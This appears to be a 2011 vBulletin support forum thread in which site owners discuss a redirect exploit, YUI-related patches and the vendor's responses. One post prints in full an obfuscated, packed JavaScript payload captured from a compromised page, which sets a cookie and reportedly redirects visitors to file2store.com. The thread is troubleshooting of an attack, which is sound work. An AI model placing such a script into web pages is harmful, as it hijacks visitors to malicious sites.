vBulletin 3.x and 4.x Redirect Security Exploit

Steve Machol · Fri 3 Jun '11, 8:39am

Originally posted by djbaxter

Well, I have no intention of moving to Xenforo but I have to agree that pareticular response from Steve seemed rather belligerent and unhelpful.

This was 'beliigerent'?

Originally posted by Steve Machol

Please start your own thread with all the relevant details. Thank you.

For the record we have always asked people to start theie own thread with their specific issue. That way we can concentrate or their problem and not have it diluted by a bunch of other people using the same thread for issues that may or may not be identical.

Sorry if that offended anyone, but this is nothing new.

Steve Machol · Fri 3 Jun '11, 8:36am

Originally posted by Bacon Butty

I have;

http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

Another instance which makes it beyond any doubt that my forums future lies with XenForo.

Sorry you feel that way but it is easier to solve issues when people start their own threads rather than hijacking someone else's thread. We have been asking people to do this for 10 years now, even when the old Devs were in charge.

djbaxter · Fri 3 Jun '11, 8:32am

Originally posted by Bacon Butty

I have;

http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

Another instance which makes it beyond any doubt that my forums future lies with XenForo.

Well, I have no intention of moving to Xenforo but I have to agree that pareticular response from Steve seemed rather belligerent and unhelpful.

Bacon Butty · Fri 3 Jun '11, 8:26am

Originally posted by Steve Machol

Please start your own thread with all the relevant details. Thank you.

I have;

http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

Another instance which makes it beyond any doubt that my forums future lies with XenForo.

Joep11 · Fri 3 Jun '11, 7:28am

The redirect is back and the errors have stopped! Why?

The last error was at 17:12:22

From access log:

77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET
/18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
66.249.72.100 - -
[03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
(compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
77.245.91.19 -
- [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
(compatible; Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
93.125.201.157 - -
[03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
"http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
/18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"
77.245.91.19 - -
[03/Jun/2011:17:12:29 +0200] "GET
/18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
"http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
Heritrix ; +http://www.buzzcapture.com)"

There is nothing strange to see...?

djbaxter · Fri 3 Jun '11, 7:20am

That's just a PHP warning but what's interesting is it implicates class_bbcode.php - the first time I've seen that specifically.

Joep11 · Fri 3 Jun '11, 7:02am

I also noticed the following...

In the error logs it shows:

[Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
pass-by-reference has been deprecated - argument passed by value; If you would
like to pass it by reference, modify the declaration of [runtime function
name](). If you would like to enable call-time pass-by-reference, you can set
allow_call_time_pass_reference to true in your INI file. However, future
versions may not support this any longer. in
/var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/

many times. It started showing when the redirect stopped working.

Anybody?

Joep11 · Fri 3 Jun '11, 2:17am

One of our sites was hit by the redirect from google.

In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:

<html><head></head><body><script type=
"text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>

When I open the page with this code in IE it goes to file2store.com.

I can't find this code in my templates. Is it of any use defining where it comes from?

Steve Machol · Thu 2 Jun '11, 3:08pm

Originally posted by Bacon Butty

Which logs mate?

Having a nightmare with this!

Any idiot guides out there? - The 'fix' from vB resolved it for a day.

Please start your own thread with all the relevant details. Thank you.

Bacon Butty · Thu 2 Jun '11, 1:14pm

Originally posted by briansol

check your logs. no one really knows and any log data you have may help find the leak.

Which logs mate?

Having a nightmare with this!

Any idiot guides out there? - The 'fix' from vB resolved it for a day.

Paul M · Thu 2 Jun '11, 11:46am

Originally posted by Ramsesx

I don't get why there is a security patch, so far as it is known, there are only two yui files affected, one isn't in vB3.x and the other one was patched already. An explanation would be appreciated.

Caution I guess, but it seems to me its probably going to cause more issues than its worth.

Btw, afaik, neither affected file exists in 3.x. The only way a 3.x forum would have had access to them is if they were using the remote hosted option, but yahoo patched them ages ago.

BirdOPrey5 · Thu 2 Jun '11, 11:17am

Originally posted by Marvin Hlavac

For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?

Originally posted by Steve Machol

Yes, 4.1.4.

I believe the logically correct answer is NO, unless there is another 3.8 patch in the works?

Steve Machol · Thu 2 Jun '11, 7:01am

Originally posted by Marvin Hlavac

For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?

Yes, 4.1.4.

Marvin Hlavac · Thu 2 Jun '11, 2:18am

Originally posted by Marvin

does the 3.8.7 PL1 include the latest YUI, or it doesn't?

Originally posted by Zachery

Right now, i Don't believe it does

Originally posted by Brian

Thanks for the confirmation of a half-patch.
Patching on my own, again...

For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?

PixelGal · Wed 1 Jun '11, 7:39pm

It looks like there has been a 4-1-3_Patch_Level_1 patch released since I last upgraded. Has anyone been hit after installing that one?

vBulletin 4 End of Life

vBulletin 3.x and 4.x Redirect Security Exploit

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Leave a comment:

Related Topics